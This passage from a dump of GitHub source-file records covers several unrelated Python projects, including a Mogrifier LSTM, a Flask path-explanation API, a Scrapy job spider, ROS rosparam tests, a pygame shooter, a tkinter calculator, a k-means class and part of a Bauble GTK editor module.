4))\n self.bhh = Parameter(torch.Tensor(hidden_sz * 4))\n # Mogrifiers\n self.Q = Parameter(torch.Tensor(hidden_sz, input_sz))\n self.R = Parameter(torch.Tensor(input_sz, hidden_sz))\n\n self.init_weights()\n\n def init_weights(self):\n for p in self.parameters():\n if p.data.ndimension() >= 2:\n nn.init.xavier_uniform_(p.data)\n else:\n nn.init.zeros_(p.data)\n\n def mogrify(self, xt, ht):\n for i in range(1, self.mog_iterations + 1):\n if i % 2 == 0:\n ht = (2 * torch.sigmoid(xt @ self.R)) * ht\n else:\n xt = (2 * torch.sigmoid(ht @ self.Q)) * xt\n return xt, ht\n\n # Define forward pass through all LSTM cells across all timesteps.\n # By using PyTorch functions, we get backpropagation for free.\n def forward(\n self,\n x: torch.Tensor,\n init_states: Optional[Tuple[torch.Tensor, torch.Tensor]] = None,\n ) -> Tuple[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]:\n \"\"\"Assumes x is of shape (batch, sequence, feature)\"\"\"\n batch_sz, seq_sz, _ = x.size()\n hidden_seq = []\n # ht and Ct start as the previous states and end as the output states in each loop below\n if init_states is None:\n ht = torch.zeros((batch_sz, self.hidden_size)).to(x.device)\n Ct = torch.zeros((batch_sz, self.hidden_size)).to(x.device)\n else:\n ht, Ct = init_states\n\n for t in range(seq_sz): # iterate over the time steps\n xt = x[:, t, :]\n xt, ht = self.mogrify(xt, ht) # mogrification\n gates = (xt @ self.Wih + self.bih) + (ht @ self.Whh + self.bhh)\n ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1)\n\n ### The 
LSTM Cell!\n            ft = torch.sigmoid(forgetgate)\n            it = torch.sigmoid(ingate)\n            Ct_candidate = torch.tanh(cellgate)\n            ot = torch.sigmoid(outgate)\n            # outputs\n            Ct = (ft * Ct) + (it * Ct_candidate)\n            ht = ot * torch.tanh(Ct)\n            ###\n\n            hidden_seq.append(ht.unsqueeze(Dim.batch))\n        hidden_seq = torch.cat(hidden_seq, dim=Dim.batch)\n        # reshape from shape (sequence, batch, feature) to (batch, sequence, feature)\n        hidden_seq = hidden_seq.transpose(Dim.batch, Dim.seq).contiguous()\n        return hidden_seq, (ht, Ct)\n","repo_name":"HallerPatrick/GERPT","sub_path":"src/models/mogrifier_lstm.py","file_name":"mogrifier_lstm.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2192090047","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nimport numpy as np\n\nfrom .src.final_functions import getPathExplanation, getDesiredPathFromWaypoint, getAnytimeAlgorithmData, variablesToUseFix, calculateShortestPath\n\napp = Flask(__name__)\ncors = CORS(app)\n\n@app.route('/1/', methods = ['GET'])\ndef get_explanations1():\n    np.random.seed(0)\n\n    desired_path = [int(n) for n in request.args.getlist('desired_path')]\n    variablesToUse = [n for n in request.args.getlist('variablesToUse')]\n    variablesToUseFix(variablesToUse)\n    \n    shortest_path, explanations, optimalValue, changedEdges = getPathExplanation(desired_path, variablesToUse)\n    \n    return jsonify({ 'shortest_path': shortest_path, 'explanations': explanations, 'changed_edges': changedEdges })\n\n@app.route('/2/', methods = ['GET'])\ndef get_explanations2():\n    np.random.seed(0)\n    \n    nodes = [int(n) for n in request.args.getlist('nodes')]\n    variablesToUse = [n for n in request.args.getlist('variablesToUse')]\n    variablesToUseFix(variablesToUse)\n    \n    print(nodes)\n    \n    # calculate the desired path, and then do the same as before.\n    # get closest nodes in our graph, to the nodes given\n    desired_path = getDesiredPathFromWaypoint(nodes, variablesToUse)\n    \n    print(desired_path)\n    if (len(desired_path) > 0):\n        shortest_path, explanations, optimalValue, changedEdges = getPathExplanation(desired_path, variablesToUse)\n\n    \n    return jsonify({ 'desired_path': desired_path, 'shortest_path': shortest_path, 'explanations': explanations, 'changed_edges': changedEdges })\n\n\n@app.route('/3/', methods = ['GET'])\ndef get_explanations3():\n    np.random.seed(0)\n    \n    nodes = [int(n) for n in request.args.getlist('nodes')]\n    variablesToUse = [n for n in request.args.getlist('variablesToUse')]\n    variablesToUseFix(variablesToUse)\n    \n    print(nodes)\n    \n    # Apply the anytime algorithm and get SP\n    shortest_path, desired_path, explanations, optimalValues, changedEdges = getAnytimeAlgorithmData(nodes, variablesToUse)\n    \n    return jsonify({ 'desired_path': desired_path, 'shortest_path': shortest_path, 'explanations': explanations, 'changed_edges': changedEdges })\n\n\n@app.route('/sp/', methods = ['GET'])\ndef get_shortest_path():\n    np.random.seed(0)\n    \n    nodes = [int(n) for n in request.args.getlist('nodes')]\n    \n    print(nodes)\n    \n    source = nodes[0]\n    target = nodes[len(nodes) - 1]\n    \n    shortest_path = calculateShortestPath(source, target)\n\n    \n    return jsonify({ 'shortest_path': shortest_path })\n\nif __name__ == \"__main__\":
\n    app.run(debug=True)","repo_name":"khalid-alsheeb/explainable-road-navigation","sub_path":"website/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18232592238","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import TencentItem\nfrom scrapy.linkextractors import LinkExtractor\n\n\nclass ZpTxSpider(scrapy.Spider):\n    name = 'zp_tx'\n    allowed_domains = ['hr.tencent.com']\n    start_urls = ['https://hr.tencent.com/position.php?lid=&tid=&keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E8%AF%8D&start=0']\n\n    def parse(self, response):\n        position_list = response.css(\"table.tablelist tr:not(:first-child):not(:last-child)\")\n        for position in position_list:\n            item = TencentItem()\n            item['job_titile'] = position.css('td.l a::text').extract_first()\n            item['link'] = response.urljoin(position.css('td.l a::attr(href)').extract_first())\n            item['category'] = position.css('td:nth-child(2)::text').extract_first()\n            item['number'] = position.css('td:nth-child(3)::text').extract_first()\n            item['place'] = position.css('td:nth-child(4)::text').extract_first()\n            item['time'] = position.css('td:nth-child(5)::text').extract_first()\n            yield item\n\n        '''\n        next_url = response.css('table.tablelist tr.f div.pagenav a:nth-last-child(2)::attr(href)').extract_first()\n        if next_url:\n            next_page = response.urljoin(next_url)\n            yield scrapy.Request(next_page, callback=self.parse)\n        '''\n        le = LinkExtractor(restrict_css='table.tablelist tr.f div.pagenav a:nth-last-child(2)')\n        next_link = le.extract_links(response)\n        if next_link:\n            next_page = next_link[0].url\n            yield scrapy.Request(next_page, callback=self.parse)\n","repo_name":"onmyway4212/scrapy","sub_path":"tencent/tencent/spiders/zp_tx.py","file_name":"zp_tx.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6024393076","text":"import os\nimport subprocess\nimport boto3\n\nimport socket\n\nip_address = socket.gethostbyname(socket.gethostname())\n\nsubprocess.call(['pip', 'install', 'boto3'])\n\nos.environ['AWS_ACCESS_KEY_ID'] = ''\nos.environ['AWS_SECRET_ACCESS_KEY'] = ''\nos.environ['AWS_REGION'] = 'us-east-1'\n\n\nclient = boto3.client('lookoutmetrics')\nresponse = client.create_anomaly_detector(\n    AnomalyDetectorName='detector1',\n    AnomalyDetectorDescription='testing detector',\n    AnomalyDetectorConfig={\n        'AnomalyDetectorFrequency': 'P1D'\n    },\n    # KmsKeyArn='string',\n    Tags={\n        'Name': 'detector'\n    }\n)","repo_name":"andalike/terraform-python","sub_path":"code-lookout.py","file_name":"code-lookout.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73345103148","text":"from pyfp.pipe import Pipe\n\ndef test_function_pipe():\n    pipe_res = Pipe(3).to(max, 4).get()\n\n    nonpipe_res = max(3, 4)\n    \n    assert pipe_res == nonpipe_res\n\ndef test_method_pipe():\n    pipe_res = Pipe(\"hello, world!\").to(str.upper).to(list).get()\n\n    nonpipe_res = list(\"hello, world!\".upper())\n\n    assert pipe_res == nonpipe_res\n\ndef test_method_front_pipe():\n    foo = {\n        1: 2,\n        3: 4,\n        5: 6\n    }\n\n    pipe_res = Pipe(foo).to_first(dict.get, 3).get()\n    nonpipe_res = foo.get(3)\n\n    assert pipe_res == nonpipe_res\n\ndef test_complex_pipe():\n    ls = [97, 98, 99, 100]\n\n    pipe_res = Pipe(ls) \\\n        .to(filter, lambda x: x % 2 == 0) 
\\\n .to(map, lambda x: chr(x)) \\\n .to(map, lambda x: x.upper()) \\\n .to(list) \\\n .get()\n\n res = list(\n map(\n lambda x: x.upper(), \n map(\n lambda x: chr(x), \n filter(\n lambda x: x % 2 == 0, \n ls\n )\n )\n )\n )\n\n assert pipe_res == res\n\ndef test_invald_argument_type():\n try:\n Pipe(3).to(3)\n assert False\n except TypeError:\n assert True","repo_name":"brettkolodny/pyfp","sub_path":"tests/test_pipe.py","file_name":"test_pipe.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12340846731","text":"import os\nimport sys \nimport unittest\nimport time\n \nfrom subprocess import Popen, PIPE, check_call, call\n\nimport rosparam\n\ndef get_test_path():\n return os.path.abspath(os.path.join(os.path.dirname(__file__)))\n\nclass TestRosparamOffline(unittest.TestCase):\n\n def setUp(self):\n pass\n\n ## test that the rosmsg command works\n def test_cmd_help(self):\n cmd = 'rosparam'\n sub = ['set', 'get', 'load', 'dump', 'delete', 'list']\n \n output = Popen([cmd], stdout=PIPE).communicate()[0]\n self.assert_('Commands' in output.decode(), output)\n output = Popen([cmd, '-h'], stdout=PIPE).communicate()[0]\n self.assert_('Commands' in output.decode())\n\n for c in sub:\n # make sure command is in usage statement\n self.assert_(\"%s %s\"%(cmd, c) in output.decode())\n \n for c in sub:\n output = Popen([cmd, c, '-h'], stdout=PIPE, stderr=PIPE).communicate()\n self.assert_(\"Usage:\" in output[0].decode(), \"%s\\n%s\" % (output, c))\n self.assert_(\"%s %s\"%(cmd, c) in output[0].decode(), \"%s: %s\" % (c, output[0].decode()))\n \n # test no args on commands that require args\n for c in ['set', 'get', 'load', 'delete']:\n output = Popen([cmd, c], stdout=PIPE, stderr=PIPE).communicate()\n self.assert_(\"Usage:\" in output[0].decode() or \"Usage:\" in output[1].decode(), \"%s\\n%s\"%(output, c))\n self.assert_(\"%s %s\"%(cmd, c) in output[1].decode())\n \n def test_offline(self):\n cmd = 'rosparam'\n\n # point at a different 'master'\n env = os.environ.copy()\n env['ROS_MASTER_URI'] = 'http://localhost:11312'\n kwds = { 'env': env, 'stdout': PIPE, 'stderr': PIPE}\n\n msg = \"ERROR: Unable to communicate with master!\" + os.linesep\n\n output = Popen([cmd, 'list'], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n output = Popen([cmd, 'set', 'foo', '1.0'], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n output = Popen([cmd, 'get', 'foo'], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n # have to test with actual file to avoid error\n path = os.path.join(get_test_path(), 'test.yaml')\n output = Popen([cmd, 'load', path], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n\n # test with file that does not exist\n output = Popen([cmd, 'load', 'fake.yaml'], **kwds).communicate()\n self.assertEquals('ERROR: file [fake.yaml] does not exist' + os.linesep, output[1].decode())\n \n output = Popen([cmd, 'dump', 'foo.yaml'], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n output = Popen([cmd, 'delete', 'foo'], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n \n","repo_name":"ros/ros_comm","sub_path":"test/test_rosparam/test/test_rosparam_command_line_offline.py","file_name":"test_rosparam_command_line_offline.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":712,"dataset":"github-code","pt":"37"} 
+{"seq_id":"43026480948","text":"import os\r\nimport pygame\r\n################################################################\r\n# 기본 초기화반드시 해야 하는 것들\r\n\r\npygame.init()#초기화(반드시 필요)\r\n\r\n#화면 크기 설정\r\nscreen_width = 640 #가로\r\nscreen_height = 480 #세로\r\nscreen = pygame.display.set_mode((screen_width, screen_height))\r\n\r\n\r\n#화면 타이틀 설정\r\npygame.display.set_caption(\"Nado Pang\") #게임 이름\r\n\r\n#FPS\r\nclock = pygame.time.Clock()\r\n########################################################################\r\n\r\n# 1. 사용자 게임 초기화 (배경화면, 게임 이미지, 좌표, 속도, 폰트 등)\r\n\r\ncurrent_path = os.path.dirname(__file__) # 현재 파일의 위치 반환\r\nimage_path = os.path.join(current_path, \"images\") # images 폴더 위치 반환\r\n\r\n# 배경이미지 불러오기\r\nbackground = pygame.image.load(os.path.join(image_path, \"background.png\"))\r\n\r\n# 스테이지 만들기\r\nstage = pygame.image.load(os.path.join(image_path, \"stage.png\"))\r\nstage_size = stage.get_rect().size\r\nstage_height = stage_size[1] # 스테이지 높이 위에 캐릭터를 두기 위해 사용\r\n\r\n#캐릭터(스프라이트) 만들기\r\ncharacter = pygame.image.load(os.path.join(image_path, \"character.png\"))\r\ncharacter_size = character.get_rect().size\r\ncharacter_width = character_size[0]\r\ncharacter_height = character_size[1]\r\ncharacter_x_pos = (screen_width/2) - (character_width/2)\r\ncharacter_y_pos = screen_height - character_height - stage_height\r\n\r\n# 캐릭터 이동 반향\r\ncharacter_to_x = 0\r\n\r\n# 캐릭터 이동 속도\r\ncharacter_speed = 5\r\n\r\n# 무기 만들기\r\nweapon = pygame.image.load(os.path.join(image_path, \"weapon.png\"))\r\nweapon_size = weapon.get_rect().size\r\nweapon_width = weapon_size[0]\r\n\r\n# 무기는 한번에 여러발 발사 가능\r\nweapons =[]\r\n\r\n# 무기 속도\r\nweapon_speed = 10\r\n\r\n#적 enemy 캐릭터\r\n\r\n\r\n#이벤트 루프\r\nrunning = True # 게임이 진행중인가?\r\nwhile running:\r\n dt = clock.tick(60) # 게임화면의 초당 프레임 수 설정\r\n\r\n \r\n# 2.이벤트 처리 (키보드, 마우스 등)\r\n for event in pygame.event.get():#이벤트가 발생 하였는가?\r\n if event.type == pygame.QUIT: # 창이 닫히는 이벤트가 발생하였는가?\r\n running == False # 게임 진행중이 아님\r\n os.sys.exit()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n character_to_x -=character_speed\r\n elif event.key == pygame.K_RIGHT:\r\n character_to_x += character_speed\r\n elif event.key == pygame.K_SPACE: # 무기 발사\r\n weapon_x_pos = character_x_pos + (character_width/2) - (weapon_width/2)\r\n weapon_y_pos = character_y_pos\r\n weapons.append([weapon_x_pos,weapon_y_pos])\r\n\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n character_to_x = 0\r\n\r\n\r\n# 3. 게임 캐릭터 위치 정의\r\n character_x_pos += character_to_x\r\n\r\n if character_x_pos < 0:\r\n character_x_pos = 0\r\n elif character_x_pos > screen_width - character_width:\r\n character_x_pos = screen_width - character_width\r\n\r\n # 무기 위치 조정\r\n # 예를 들어 발사 위치가 100,200 일 때 y값은 계속 줄어들며 변함\r\n # -> 180,160,120....\r\n # 이변 환 값들을 리스트로 묶어 처리\r\n\r\n weapons = [[w[0],w[1] - weapon_speed] for w in weapons] #무기 위치를 위로 올림\r\n\r\n # 천정에 닿은 무기 없애기\r\n weapons = [[w[0],w[1]] for w in weapons if w[1] > 0]# 천정에 닿지 않은 무기만 배열에 저장\r\n\r\n# 4. 충돌 처리\r\n\r\n\r\n\r\n# 5. 
화면에 그리기\r\n screen.blit(background,(0,0)) #배경 그리기\r\n for weapon_x_pos, weapon_y_pos in weapons: # 발사된 무기 그려주기\r\n screen.blit(weapon, (weapon_x_pos,weapon_y_pos))\r\n screen.blit(stage,(0, screen_height-stage_height)) # 스테이지 그리기\r\n screen.blit(character, (character_x_pos, character_y_pos)) # 캐릭터 그리기\r\n \r\n \r\n pygame.display.update()\r\n\r\n# pygame 종료\r\npygame.quit()\r\n\r\n","repo_name":"kjunk624/development","sub_path":"PythonWorkspace/PythonEx/pygame_project/2_weapon_keyevent.py","file_name":"2_weapon_keyevent.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27786708208","text":"import tkinter as tk\n\n\nclass Calculator:\n def __init__(self, master):\n self.master = master\n master.title(\"Calculadora\")\n\n # Criar campo de entrada\n self.entry = tk.Entry(master, width=25, borderwidth=5, font=('Arial', 12))\n self.entry.grid(row=0, column=0, columnspan=4, padx=10, pady=10)\n\n # Criar botões\n buttons = [\n '7', '8', '9', '/',\n '4', '5', '6', '*',\n '1', '2', '3', '-',\n '0', '.', 'C', '+'\n ]\n r = 1\n c = 0\n for btn in buttons:\n command = lambda x=btn: self.handle_click(x)\n tk.Button(master, text=btn, width=5, height=2, command=command).grid(row=r, column=c, padx=5, pady=5)\n c += 1\n if c == 4:\n c = 0\n r += 1\n\n # Criar botão \"C\"\n tk.Button(master, text='C', width=5, height=2, command=lambda: self.entry.delete(0, tk.END)).grid(row=4, column=1, padx=5, pady=5)\n\n # Criar botão \"0\"\n tk.Button(master, text='0', width=5, height=2, command=lambda: self.entry.insert(tk.END, '0')).grid(row=4, column=0, padx=5, pady=5)\n\n # Criar botão \"=\"\n tk.Button(master, text='=', width=5, height=2, command=lambda: self.handle_click('=')).grid(row=4, column=1, padx=5, pady=5)\n\n def handle_click(self, key):\n if key == '=':\n try:\n result = eval(self.entry.get())\n self.entry.delete(0, tk.END)\n self.entry.insert(0, str(result))\n except:\n self.entry.delete(0, tk.END)\n self.entry.insert(0, \"Erro\")\n elif key == 'C':\n self.entry.delete(0, tk.END)\n else:\n self.entry.insert(tk.END, key)\n\n\nroot = tk.Tk()\ncalc = Calculator(root)\nroot.mainloop()\n","repo_name":"Deivid7x/Calculadora","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30275773345","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics.pairwise import cosine_distances, euclidean_distances\nfrom sklearn.base import BaseEstimator, ClusterMixin\nfrom tdigest import tdigest\n\n\nclass KMeansCosine(BaseEstimator, ClusterMixin):\n\n def __init__(self, n_clusters, iter=300, metric='euclidean'):\n self.n_clusters = n_clusters\n self.iter = iter\n self.metric = metric\n\n self.labels = []\n self.centers = []\n\n self.X = None\n\n def init_centers(self):\n return self.X[np.random.choice(self.X.shape[0], self.n_clusters, replace=False)]\n\n def assign_labels(self, centers):\n if self.metric == 'cosine':\n D = cosine_distances(self.X, centers)\n else:\n D = euclidean_distances(self.X, centers)\n return np.argmin(D, axis=1)\n\n def update_centers(self, labels):\n centers = np.zeros((self.n_clusters, self.X.shape[1]))\n for k in range(self.n_clusters):\n Xk = self.X[labels == k, :]\n centers[k, :] = np.mean(Xk, axis=0)\n return centers\n\n @staticmethod\n def has_converged(centers, new_centers):\n return (set([tuple(a) for a in centers]) ==\n 
set([tuple(a) for a in new_centers]))\n\n def fit(self, X, y=None):\n self.X = X\n self.centers = [self.init_centers()]\n self.labels = []\n it = 0\n while it <= self.iter:\n self.labels.append(self.assign_labels(self.centers[-1]))\n new_centers = self.update_centers(self.labels[-1])\n if self.has_converged(self.centers[-1], new_centers):\n break\n self.centers.append(new_centers)\n it += 1\n\n self.labels = self.labels[-1]\n self.centers = self.centers[-1]\n\n def fit_predict(self, X, y=None):\n self.fit(X, y)\n\n def distance(self):\n dist = []\n\n for l in set(self.labels):\n x = self.X[self.labels == l, :]\n if self.metric == 'cosine':\n D = cosine_distances(x, self.centers)\n else:\n D = euclidean_distances(x, self.centers)\n\n for d in D:\n dist.append(d[l])\n\n return dist\n\n def score(self, compression=100, q=0.8):\n t = tdigest.TDigest(compression)\n results = []\n\n for l in set(self.labels):\n x = self.X[self.labels == l, :]\n if self.metric == 'cosine':\n D = cosine_distances(x, self.centers)\n else:\n D = euclidean_distances(x, self.centers)\n\n for d in D:\n t.add(d[l])\n\n results.append(t.percentile(q))\n\n return results\n\n def display(self):\n if self.X.shape[1] != 2:\n return\n\n for l in set(self.labels):\n x = self.X[self.labels == l, :]\n plt.plot(x[:, 0], x[:, 1], 'o', markersize=4, alpha=.8)\n\n plt.axis('equal')\n plt.plot()\n plt.show()\n","repo_name":"kietdinh/people-wiki-recommendation","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34145193018","text":"from tensorflow.examples.tutorials.mnist import input_data\n\n# minst测试集\nmnist = input_data.read_data_sets('mnist/', one_hot=True)\n# 每次使用100条数据进行训练\nbatch_size = 100\n# 图像向量\nwidth = 28\nheight = 28\n# LSTM隐藏神经元数量\nrnn_size = 256\n# 输出层one-hot向量长度的\nout_size = 10\n","repo_name":"lpty/tensorflow_tutorial","sub_path":"mnistRnn/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"zh","doc_type":"code","stars":242,"dataset":"github-code","pt":"37"} +{"seq_id":"8584124535","text":"import datetime\nimport os\nimport sys\nimport weakref\n\nimport logging\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nfrom gi.repository import GLib\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\nfrom gi.repository import GdkPixbuf\n\nfrom random import random\nimport lxml.etree as etree\nfrom gi.repository import Pango\nfrom sqlalchemy.orm import object_mapper, object_session\nfrom sqlalchemy.orm.exc import UnmappedInstanceError\n\n\nimport bauble\nimport bauble.db as db\nfrom bauble.error import check\nimport bauble.paths as paths\nimport bauble.prefs as prefs\nimport bauble.utils as utils\nfrom bauble.error import CheckConditionError\n\n# TODO: create a generic date entry that can take a mask for the date format\n# see the date entries for the accession and accession source presenters\n\n\nclass ValidatorError(Exception):\n\n def __init__(self, msg):\n self.msg = msg\n\n def __str__(self):\n return self.msg\n\n\nclass Validator(object):\n \"\"\"\n The interface that other validators should implement.\n \"\"\"\n\n def to_python(self, value):\n raise NotImplementedError\n\n\nfrom bauble.utils import parse_date\n\nclass DateValidator(Validator):\n \"\"\"\n Validate that string is parseable with dateutil\n \"\"\"\n def to_python(self, value):\n if not 
value:\n return None\n dayfirst = prefs.prefs[prefs.parse_dayfirst_pref]\n yearfirst = prefs.prefs[prefs.parse_yearfirst_pref]\n default_year = 1999\n default = datetime.date(default_year, 1, 1)\n try:\n value = parse_date(value, dayfirst=dayfirst,\n yearfirst=yearfirst, default=default)\n if value.year == default_year:\n raise ValueError\n except Exception as e:\n raise ValidatorError(str(e))\n return value\n\n\n# class DateTimeValidator(object):\n# pass\n\n\nclass StringOrNoneValidator(Validator):\n \"\"\"\n If the value is an empty string then return None, else return the\n str() of the value.\n \"\"\"\n\n def to_python(self, value):\n if value in ('', '', None):\n return None\n return str(value)\n\n\nclass UnicodeOrNoneValidator(Validator):\n \"\"\"\n If the value is an empty unicode string then return None, else\n return the unicode() of the value. The default encoding is\n 'utf-8'.\n \"\"\"\n def __init__(self, encoding='utf-8'):\n self.encoding = encoding\n\n def to_python(self, value):\n if value in ('', '', None):\n return None\n return utils.to_unicode(value, self.encoding)\n\n\nclass UnicodeOrEmptyValidator(Validator):\n \"\"\"\n If the value is an empty unicode string then return '', else\n return the unicode() of the value. The default encoding is\n 'utf-8'.\n \"\"\"\n def __init__(self, encoding='utf-8'):\n self.encoding = encoding\n\n def to_python(self, value):\n if not value.strip():\n return ''\n return utils.to_unicode(value, self.encoding)\n\n\nclass IntOrNoneStringValidator(Validator):\n \"\"\"\n If the value is an int, long or can be cast to int then return the\n number, else return None\n \"\"\"\n\n def to_python(self, value):\n if value is None or (isinstance(value, str) and value == ''):\n return None\n elif isinstance(value, int):\n return value\n try:\n return int(value)\n except Exception:\n raise ValidatorError('Could not convert value to int: %s (%s)'\n % (value, type(value)))\n\n\nclass FloatOrNoneStringValidator(Validator):\n \"\"\"\n If the value is an int, long, float or can be cast to float then\n return the number, else return None\n \"\"\"\n\n def to_python(self, value):\n if value is None or (isinstance(value, str) and value == ''):\n return None\n elif isinstance(value, (int, float)):\n return value\n try:\n return float(value)\n except Exception:\n raise ValidatorError('Could not convert value to float: %s (%s)'\n % (value, type(value)))\n\n\ndef default_completion_cell_data_func(column, renderer, model, treeiter, data=None):\n '''\n the default completion cell data function for\n GenericEditorView.attach_completions\n '''\n v = model[treeiter][0]\n renderer.set_property('markup', utils.to_unicode(v))\n\n\ndef default_completion_match_func(completion, key_string, treeiter):\n '''\n the default completion match function for\n GenericEditorView.attach_completions, does a case-insensitive string\n comparison of the the completions model[iter][0]\n '''\n value = completion.get_model()[treeiter][0]\n return str(value).lower().startswith(key_string.lower())\n\n\nclass GenericEditorView(object):\n \"\"\"\n A generic class meant (not) to be subclassed, to provide the view\n for the Ghini Model-View-Presenter pattern. 
\n    subclass the Presenter alone, and that the View remains as 'stupid'\n    as is conceivable.\n\n    The presenter should interact with the view only through this\n    interface; please consider all members of the view as private. This is\n    particularly true for the ones having anything to do with GTK.\n\n    :param filename: a Gtk.Builder UI definition\n\n    :param parent: a Gtk.Window or subclass to use as the parent\n     window, if parent=None then bauble.gui.window is used\n    \"\"\"\n    _tooltips = {}\n\n    def __init__(self, filename, parent=None, root_widget_name=None):\n        self.root_widget_name = root_widget_name\n        builder = self.builder = Gtk.Builder()\n        builder.add_from_file(filename)\n        self.filename = filename\n        self.widgets = utils.BuilderWidgets(builder)\n        if parent:\n            self.get_window().set_transient_for(parent)\n        elif bauble.gui:\n            self.get_window().set_transient_for(bauble.gui.window)\n        self.response = None\n        self.__attached_signals = []\n        self.boxes = set()\n\n        # set the tooltips...use Gtk.Tooltip api introduced in GTK+ 2.12\n        for widget_name, markup in self._tooltips.items():\n            try:\n                self.widgets[widget_name].set_tooltip_markup(markup)\n            except Exception as e:\n                values = dict(widget_name=widget_name, exception=e)\n                logger.debug(_('Couldn\\'t set the tooltip on widget '\n                               '%(widget_name)s\\n\\n%(exception)s') % values)\n\n        try:\n            window = self.get_window()\n        except:\n            window = None\n        if window is not None:\n            self.connect(window, 'delete-event', self.on_window_delete)\n            if isinstance(window, Gtk.Dialog):\n                self.connect(window, 'close', self.on_dialog_close)\n                self.connect(window, 'response', self.on_dialog_response)\n        self.box = set()  # the top level, meant for warnings.\n\n    def cancel_threads(self):\n        pass\n\n    def update(self):\n        pass\n\n    def run_file_chooser_dialog(\n            self, text, parent, action, buttons, last_folder, target):\n        \"\"\"create and run FileChooserDialog, then write result in target\n\n        this is just a bit more than a wrapper. It adds 'last_folder', a
\n        string indicating the location where to open the FileChooserDialog,\n        and 'target', an Entry widget or its name.\n\n        Make sure you have a Gtk.ResponseType.ACCEPT button.\n\n        \"\"\"\n        chooser = Gtk.FileChooserDialog(text, parent, action, buttons)\n        #chooser.set_do_overwrite_confirmation(True)\n        #chooser.connect(\"confirm-overwrite\", confirm_overwrite_callback)\n        try:\n            if last_folder:\n                chooser.set_current_folder(last_folder)\n            if chooser.run() == Gtk.ResponseType.ACCEPT:\n                filename = chooser.get_filename()\n                if filename:\n                    self.widget_set_value(target, filename)\n        except Exception as e:\n            logger.warning(\"unhandled %s exception in editor.py: %s\" %\n                           (type(e), e))\n        chooser.destroy()\n\n    def run_entry_dialog(self, title, parent, flags, buttons, visible=True):\n        d = Gtk.Dialog(title, parent, flags, buttons)\n        d.set_default_response(Gtk.ResponseType.ACCEPT)\n        d.set_default_size(250, -1)\n        entry = Gtk.Entry()\n        if visible is not True:\n            entry.set_visibility(False)\n        entry.connect(\"activate\",\n                      lambda entry: d.response(Gtk.ResponseType.ACCEPT))\n        d.vbox.pack_start(entry, True, True, 0)\n        d.show_all()\n        d.run()\n        user_reply = entry.get_text()\n        d.destroy()\n        return user_reply\n\n    def run_message_dialog(self, msg, type=Gtk.MessageType.INFO,\n                           buttons=Gtk.ButtonsType.OK, parent=None):\n        utils.message_dialog(msg, type, buttons, parent)\n\n    def run_yes_no_dialog(self, msg, parent=None, yes_delay=-1):\n        return utils.yes_no_dialog(msg, parent, yes_delay)\n\n    def get_selection(self):\n        '''return the selection in the graphic interface'''\n        class EmptySelectionException(Exception):\n            pass\n        from bauble.view import SearchView\n        view = bauble.gui.get_view()\n        try:\n            check(isinstance(view, SearchView))\n            tree_view = view.results_view.get_model()\n            check(tree_view is not None)\n        except CheckConditionError:\n            self.run_message_dialog(_('Search for something first.'))\n            return\n\n        return [row[0] for row in tree_view]\n\n    def set_title(self, title):\n        self.get_window().set_title(title)\n\n    def set_icon(self, icon):\n        self.get_window().set_icon(icon)\n\n    def image_set_from_file(self, widget, value):\n        widget = (isinstance(widget, Gtk.Widget)\n                  and widget\n                  or self.widgets[widget])\n        widget.set_from_file(value)\n\n    def set_label(self, widget_name, value):\n        getattr(self.widgets, widget_name).set_markup(value)\n\n    def close_boxes(self):\n        while self.boxes:\n            logger.debug('box is being forcibly removed')\n            box = self.boxes.pop()\n            self.widgets.remove_parent(box)\n            box.destroy()\n\n    def add_box(self, box):\n        logger.debug('box is being added')\n        self.boxes.add(box)\n\n    def remove_box(self, box):\n        logger.debug('box is being removed')\n        if box in self.boxes:\n            self.boxes.remove(box)\n            self.widgets.remove_parent(box)\n            box.destroy()\n        else:\n            logger.debug('box to be removed is not there')\n\n    def add_message_box(self, message_box_type=utils.MESSAGE_BOX_INFO):\n        \"\"\"add a message box to the message_box_parent container\n\n        :param type: one of MESSAGE_BOX_INFO, MESSAGE_BOX_ERROR 